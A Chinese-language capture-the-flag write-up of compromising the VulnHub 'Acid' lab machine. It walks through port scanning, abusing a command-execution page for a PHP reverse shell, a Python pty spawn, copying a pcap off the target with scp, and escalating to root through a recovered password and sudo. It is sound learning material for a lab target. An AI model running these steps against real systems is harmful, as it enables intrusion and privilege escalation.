渗透测试之ACID

本次实验使用的靶机：vulnhub-acid

测试过程详解：

1. 首先使用nmap探测存活端口：nmap 10.1.1.1/24，扫描整个虚拟机存在的网段，探测存活的主机。在同一局域网内，还可以使用其他的探测方法。得到主机IP地址：10.1.1.142
   
2. 探测到存活主机下意识使用80端口访问，结果这么鸡贼的web服务居然没有在80端口，得了，再来一遍端口扫描：nmap -sS -sV -v -p- 10.1.1.142，发现只开放了33447端口，web服务就在这个端口上。
   
   访问一波：
   
   然后还在源码里面找到一些小提示，然而后续的测试并没有用到，是个假提示。。。。
   
   经过16进制->ascii->一张图片地址->图片藏有16进制字符串->ascii码字符->md5解密：
   
3. 找到web服务的第一步就是进行web目录扫描，查看有哪些web文件，此时你需要一个异常强大的字典。开始扫描用了两三个扫描器都没扫到有用的WEB目录。
   
   发现了一些有用的web文件，访问一波：
   index.php：登录，没有账号密码，先放弃
   hacked.php:开始还以为有后门，结果不是，让我输入一个id，把之前拿到的那玩意输进去，没啥用，暂时放弃，而且之后查看了一下这个文件，明明是个注入点，但是就是测不出来，有鬼。
   include.php:一个文件包含的页面，但是没有上传点，拿不到shell，想看看其他文件也失败了，放弃。
   cake.php:这个文件截图没有，但是存在，访问了一波，也没啥用，但是标题指向了一个新的目录，继续扫描一波。
   
   发现如下目录：
   low.php:经过查看源码，这个也是一个命令执行的文件，但是由于不知道输入什么参数，所以没啥用。
   command.php:一个存在命令执行漏洞的文件，尝试一波命令执行反弹shell。
   
   既然可以命令执行，尝试一波反弹shell：
   首先在kali上面nc监听一个端口:
   
   之后尝试各种反弹shell的方式，只有php反弹shell成功：
   
   
   
4. 获取低权限shell，进行权限提升，作为一枚菜鸡，不太会利用内核漏洞啥的提权，没收集这么多exp【菜.jpg】，那就只能尝试使用su命令来提权了，结果遇到一个坑，不是终端环境，su命令无法执行，于是学到了利用python调用本地shell,生成终端环境：
   
   生成python文件，调用本地终端：
   1、echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
   2、python /tmp/asdf.py
   
5. 接下来就是提权了：
   首先看看/etc/passwd文件，看看有哪些用户：
   
   重点关注acid、saman、www-data这个几个用户，然后对每个用户进行了一次用户目录查找，看一下有什么特殊文件：
   
   在acid用户下发现一个pacp流量包，下载下来，使用wireshark分析一下：
   
6. 在本地打开ssh服务，然后通过命令：scp /sbin/raw_vs_isi/hint.pcapng [email protected]:/root/将文件下载到本地，然后分析一波。
   
   之后看到巨多的SNMP协议包，还以为会有什么敏感信息藏在里面，分析了一波UDP数据流，结果啥都没有：
   
   之后乖乖分析TCP协议流，然后密码就藏在第一个流当中，采坑真可怕：
   
7. 拿到密码之后提升到saman用户，然后利用sudo -i的命令可以提升到root用户
   
   sudo -i: 为了频繁的执行某些只有超级用户才能执行的权限，而不用每次输入密码，可以使用该命令。提示输入密码时该密码为当前账户的密码。没有时间限制。执行该命令后提示符变为“#”而不是“$”。想退回普通账户时可以执行“exit”或“logout” 。
   权限到手天下我有，之后就打算分析一波整个web服务的结构，看能不能挖到新的漏洞，有没有其他的漏洞可以利用一波。